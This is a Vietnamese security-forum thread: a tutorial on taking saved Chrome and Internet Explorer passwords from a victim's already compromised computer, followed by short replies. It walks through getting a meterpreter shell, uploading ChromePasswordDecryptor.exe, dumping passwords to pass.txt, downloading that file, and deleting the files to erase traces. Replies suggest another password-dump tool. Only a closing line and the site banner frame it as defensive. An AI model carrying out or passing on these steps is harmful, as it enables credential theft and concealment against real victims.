Lấy mật khẩu đã lưu trong trình duyệt Google-Chrome và IE từ máy tính đã bị xâm nhập

DDos

VIP Members
22/10/2013
524
2.191 bài viết
Lấy mật khẩu đã lưu trong trình duyệt Google-Chrome và IE từ máy tính đã bị xâm nhập
Hiện nay, mình thấy một thực trạng khá phổ biến là khi mọi người đăng nhập vào một trang web nào đó, bạn luôn nhớ mật khẩu để dễ dàng và tránh phải nhập cho lần sau. Đứng trên góc độ của người dùng bình thường thì nó không có ý nghĩa gì cả, nhưng đứng trên góc độ bảo mật thì đó là một mối nguy hiểm. Trong topic này mình sẽ hướng dẫn các bạn lấy mật khẩu đã lưu trong trình duyệt của một máy tính đã bị thâm nhập. Bài này mình sẽ hướng dẫn lấy mất khẩu đã lưu trong trình duyệt Google-Chrome và IE, bài sau sẽ là Firefox.

Yêu cầu: ChromePasswordDecryptor.exe. Các bạn có thể download ở đây:
HTML:
http://adf.ly/Ychl0

Bước 1: Dành một meterpreter shell bằng cách sử dụng bất kỳ một lỗ hổng nào đó về hệ thống. Bạn có thể tham khảo bài viết trước của mình ở đây.
HTML:
http://whitehat.vn/threads/4886-Bypass-antivirus-va-get-mot-meterpreter-su-dung-Veil.html

1490892957Screenshot from 2013-11-01 16-27-17.png



Bước 2: Download file ChromePasswordDecryptor.exe và upload tới nạn nhân của bạn.


1490892957Screenshot from 2013-11-01 16-29-20.png


Bước 3: Thực thi file bằng cách sử dụng lệnh sau:
ChromePasswordDecryptor.exe "pass.txt"
1490892957Screenshot from 2013-11-01 16-31-24.png


Bước 4: Download file pass.txt đã trích xuất được từ bước 3

download pass.txt /root/Desktop


1490892957Screenshot from 2013-11-01 16-32-52.png


Bước 5: Xóa dấu vết bằng cách xóa cả file thực thi và file pass.txt đã được trích ra

rm ChromePasswordDecryptor.exe
rm pass.txt


1490892957Screenshot from 2013-11-01 16-34-08.png


Để rõ hơn các bạn xem video sau:


[video=youtube;G1dw2qt9sqg]http://www.youtube.com/watch?feature=player_embedded&v=G1dw2qt9sqg[/video]

Qua đây, mình nhắc nhỏ mọi người là luôn cập nhật phần mềm diệt virus và hệ điều hành tới phiên bản mới nhất và không click vào bất kỳ một link lạ nào đó. Và tốt hơn hết là không nên lưu mật khẩu vào trình duyệt.

Cảm ơn vì đã đọc bài viết của mình!
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Re: Lấy mật khẩu đã lưu trong trình duyệt Google-Chrome và IE từ máy tính đã bị xâm n

Nhưng điều kiện cần là phải xâm nhập được vào máy tính nạn nhân.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Lấy mật khẩu đã lưu trong trình duyệt Google-Chrome và IE từ máy tính đã bị xâm n

Bác làm gì cho phiền thế, sử dụng cái này http://securityxploded.com/browser-password-dump.php lấy cả mật khẩu IE, Chrome, FireFox,... và một số trình duyệt khác luôn ;)
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Lấy mật khẩu đã lưu trong trình duyệt Google-Chrome và IE từ máy tính đã bị xâm n

Thì tiêu đề mình đã nêu rõ rồi mà...
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Lấy mật khẩu đã lưu trong trình duyệt Google-Chrome và IE từ máy tính đã bị xâm n

whf;9387 đã viết:
Bác làm gì cho phiền thế, sử dụng cái này http://securityxploded.com/browser-password-dump.php lấy cả mật khẩu IE, Chrome, FireFox,... và một số trình duyệt khác luôn ;)
dùng tools đấy khi bạn đã có quyền truy cập vật lí tới máy tính đó rồi, còn đâu là remote
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Lấy mật khẩu đã lưu trong trình duyệt Google-Chrome và IE từ máy tính đã bị xâm n

Lãng Tử Vùng Cao;9385 đã viết:
Nhưng điều kiện cần là phải xâm nhập được vào máy tính nạn nhân.
Thì tiêu đề mình đã nêu rõ rồi mà...
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bên trên